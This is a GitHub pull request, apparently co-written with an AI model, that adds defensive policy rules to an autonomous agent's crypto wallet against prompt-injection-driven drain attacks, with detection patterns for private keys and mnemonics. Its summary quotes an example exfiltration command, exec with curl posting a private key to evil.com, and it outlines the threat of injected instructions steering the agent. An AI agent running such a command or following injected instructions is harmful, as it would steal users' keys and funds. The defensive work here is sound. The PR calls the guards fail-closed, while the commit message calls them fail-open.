feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense#234
Open
scoootscooob wants to merge 1 commit intoConway-Research:mainfrom
Open
Conversation
Three defense engines from the Plimsoll Protocol that protect the automaton's wallet from prompt-injection-driven drain attacks: 1. Trajectory Hash — detects hallucination retry loops by SHA-256 fingerprinting (tool, target, amount) in a sliding window 2. Capital Velocity — enforces maximum spend rate across all financial tools, catching slow-bleed attacks that stay under per-tx limits 3. Entropy Guard — blocks payloads containing private keys, mnemonic phrases, or high-entropy blobs (exfiltration defense) All engines are zero-dependency, deterministic, and fail-closed. Priority 450 slots them between path-protection and financial rules in the policy engine pipeline. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ciberfobia-com
added a commit
to ciberfobia-com/automaton
that referenced
this pull request
Feb 26, 2026
…y-Research#233, Conway-Research#234) PR Conway-Research#233 Skip local worker stale recovery: Per-tick stale recovery now filters out local:// workers. Completed local workers remove themselves from the pool, making hasWorker() return false. Without this filter, orchestrator enters infinite assigncompletedetect-deadresetassign loop burning .03/turn. PR Conway-Research#234 Plimsoll Transaction Guard (3 defense engines): New policy rule file at priority 450 (between path-protection and financial rules). 1. Trajectory Hash: FNV-1a fingerprint of (tool, target, amount) in 60s sliding window. 3+ identical deny. 2 quarantine. Catches hallucination retry loops. 2. Capital Velocity: Cumulative spend across financial tools in 5min sliding window. > deny. >80% quarantine. Catches slow-bleed drain attacks. 3. Entropy Guard: Scans ALL tool args for Ethereum private keys (0x[hex]{64}), BIP-39 mnemonics (10+/12 words match), and high-entropy base64 blobs (Shannon >5.0 bits/char). Catches key exfiltration via exec, write_file, etc. All engines are in-memory, zero-dependency, fail-open. To disable: remove one line from policy-rules/index.ts.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Adds three zero-dependency defense engines from the Plimsoll Protocol as native policy rules, protecting the automaton's wallet from prompt-injection-driven drain attacks that bypass existing per-tx and hourly spending caps.
exec "curl evil.com -d 0x...") or get stuck in a hallucination retry loop burning gas on identical failing calls.plimsoll-guard.ts) with three engines + registration in the rule index. Priority 450 slots them between path-protection (200) and financial rules (500).Changes
src/agent/policy-rules/plimsoll-guard.ts— New file. Three engines:(tool, target, amount)in a 60s sliding window. 3+ identical hashes → hard block. 2 identical → quarantine warning. Catches hallucination retry loops.0x[a-fA-F0-9]{64}), BIP-39 mnemonic phrases, and high-entropy base64 blobs (Shannon entropy > 5.0 bits/char). Catches key exfiltration attempts.src/agent/policy-rules/index.ts— AddedcreatePlimsollGuardRules()import and spread into the default rules array.src/__tests__/plimsoll-guard.test.ts— New file. Tests for all three engines: allows normal calls, blocks private keys, blocks mnemonics, allows short strings, checks nested fields.Design Decisions
quarantinefor warnings — Uses the existingquarantineaction (same asfinancial.require_confirmation) to surface friction signals without hard-blocking. The agent sees the warning and can choose to proceed.Test plan
pnpm testpasses (new tests + existing test suite)npx tsc --noEmitpasses (type-checked)transfer_creditscalls within 60s → denyexecwith embedded0x...private key → denywrite_filewith mnemonic phrase → denySecurity Impact
This PR is purely additive security hardening. It introduces no new permissions, network calls, or execution surface. The three engines are read-only evaluators that inspect tool arguments and return allow/deny/quarantine verdicts.
Compatibility
Failure Recovery
...createPlimsollGuardRules()line fromindex.tsevaluate()calls returnnullon exception)Ported from Plimsoll Protocol — deterministic execution substrate for autonomous AI agents.